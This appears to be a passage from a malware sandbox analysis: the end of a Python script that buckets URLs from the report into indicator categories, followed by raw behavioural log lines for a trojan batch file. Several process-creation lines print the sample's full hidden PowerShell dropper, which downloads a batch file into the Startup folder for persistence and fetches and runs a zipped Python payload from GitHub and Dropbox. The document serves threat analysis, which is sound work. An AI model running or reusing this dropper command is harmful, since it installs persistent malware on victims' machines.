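# report attributes to the .bat: GitHub raw content and Dropbox shared-file links.
STAGING_HOST_PATTERNS = (
    re.compile(r"^raw\.githubusercontent\.com$"),
    re.compile(r"\.dl\.dropboxusercontent\.com$"),
)
STAGING_PATH_RE = re.compile(r"(^/[^/]+/[^/]+/raw/)|(^/scl/fi/)")


def parse_row(line):
    """Return (sources, url) for one string-finding row, or None for any other row."""
    m = ROW_RE.match(line)
    if not m:
        return None
    sources = [s.strip() for s in m.group("sources").split(",") if s.strip()]
    # Strip markdown residue such as a trailing ")" that the report kept verbatim.
    return sources, m.group("url").rstrip(").,;")


def normalize(url):
    """Lower-case scheme and host only; path and query stay case-sensitive."""
    p = urlsplit(url)
    return p._replace(scheme=p.scheme.lower(), netloc=p.netloc.lower()).geturl()


def classify(sources, url, sample_name):
    """Bucket a URL by where it came from and where it points."""
    parts = urlsplit(url)
    host = parts.netloc.lower()
    if sample_name in sources:
        return "sample"            # literally present in the submitted script: strongest IOC
    if any(p.search(host) for p in STAGING_HOST_PATTERNS) or STAGING_PATH_RE.search(parts.path):
        return "staging"           # download-stage pattern seen only in a runtime memory dump
    if all(s.endswith(".dr") for s in sources):
        return "dropped-library"   # lives in a dropped library file, not in anything the sample wrote
    return "review"                # cached web content, docs, licence URLs and the like


def triage(lines, sample_name="T3-03-17.bat"):
    """Group unique normalized URLs by bucket, keeping the first source list seen per URL."""
    buckets = {"sample": {}, "staging": {}, "dropped-library": {}, "review": {}}
    for line in lines:
        parsed = parse_row(line)
        if parsed is None:
            continue
        sources, url = parsed
        buckets[classify(sources, url, sample_name)].setdefault(normalize(url), sources)
    return buckets


if __name__ == "__main__":
    for bucket, urls in triage(REPORT_LINES).items():
        for url, sources in urls.items():
            print(f"{bucket:16} {url}  <- {', '.join(sources)}")
```

Two rows are worth noticing in the output. The lower-cased `t3.zip` copy of the Dropbox link lands in `staging` rather than `sample`, because the dump row that carries it does not list the .bat among its sources; keeping path case in the key is deliberate, since the two spellings are the same download but distinct evidence. And plain `https://www.dropbox.com/` stays in `review`: it is in a PowerShell dump, but it is the site's own page content, not a staging URL, and the host alone is too common to block on.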
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54803
          Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 54803 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknown | HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49721 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49722 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.5:49723 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.5:49724 version: TLS 1.2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\Document\DLLs\python_tools.cat

          System Summary

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_overlapped.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\tcl86t.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_lzma.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md__mypyc.cp310-win_amd64.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_ssl.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_bz2.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_msi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\selenium\webdriver\common\windows\selenium-manager.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_sqlite3.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testcapi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\tk86t.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\python.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testinternalcapi.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\libcrypto-1_1.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_queue.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_decimal.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\vcruntime140_1.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testbuffer.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_testimportmultiple.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_asyncio.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\_ctypes.pydJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-32.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\DLLs\libffi-7.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_testconsole.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-arm64.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_socket.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\sqlite3.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\python310.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\winsound.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_multiprocessing.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\vcruntime140.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_ctypes_test.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\libssl-1_1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_elementtree.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\_hashlib.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\unicodedata.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\select.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\Lib\site-packages\setuptools\cli-64.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\DLLs\pyexpat.pyd
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\Public\Document\Lib\site-packages\charset_normalizer\md.cp310-win_amd64.pyd
          Source: Joe Sandbox View Dropped File: C:\Users\Public\Document\DLLs\_asyncio.pyd A9A99A2B847E46C0EFCE7FCFEFD27F4BCE58BAF9207277C17BFFD09EF4D274E5
          Source: unicodedata.pyd.2.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: _overlapped.pyd.2.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: _testbuffer.pyd.2.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: classification engine Classification label: mal100.troj.expl.evad.winBAT@16/1793@5/5
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ikkdopoj.kx0.ps1
          Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" "
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\T3-03-17.bat" "
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSecure.bat" "
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Document\python.exe "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py
          Source: C:\Users\Public\Document\python.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
          Source: C:\Users\Public\Document\python.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://github.com/ty9989/u/raw/main/ud.bat', 'C:\Users\user\AppData\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsSecure.bat'); (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/jilrq6ix8zawo0sxxae34/T3.zip?rlkey=s8rr5tdcgngid6xu80hiitv43&st=i6clmk71&dl=1', 'C:\\Users\\Public\\Document.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document'); Start-Sleep -Seconds 1; C:\\Users\\Public\\Document\\python.exe C:\Users\Public\Document\Lib\prt.py; Remove-Item 'C:/Users/Public/Document.zip' -Force"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\Document\python.exe "C:\Users\Public\Document\python.exe" C:\Users\Public\Document\Lib\prt.py
          Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "C:\Users\Public\Document\python C:\Users\Public\Document\Lib\prt.py"
          Source: C:\Users\Public\Document\python.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
          Source: C:\Users\Public\Document\python.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
          Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: python310.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: vcruntime140.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: version.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: vcruntime140.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: cryptsp.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: rsaenh.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: cryptbase.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: python3.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: libcrypto-1_1.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: iphlpapi.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: libssl-1_1.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: mswsock.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: pywintypes310.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: vcruntime140_1.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: vcruntime140_1.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: sqlite3.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: sspicli.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: dnsapi.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: rasadhlp.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\Public\Document\python.exe Section loaded: kernel.appcore.dll
          Source: Window Recorder Window detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
          Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.2.dr
          Source: Binary string: D:\a\1\b\bin\amd64\python.pdb source: python.exe, 00000013.00000000.2362705216.00007FF606182000.00000002.00000001.01000000.00000007.sdmp, python.exe.2.dr
          Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: vcruntime140.dll.2.dr
          Source: Binary string: and f.endswith(('.exe', '.pdb'))): source: powershell.exe, 00000002.00000002.2527605987.0000023CE62DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2527605987.0000023CE62D2000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: libcrypto-1_1.dll.2.dr
          Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: _overlapped.pyd.2.dr
          Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.2.dr
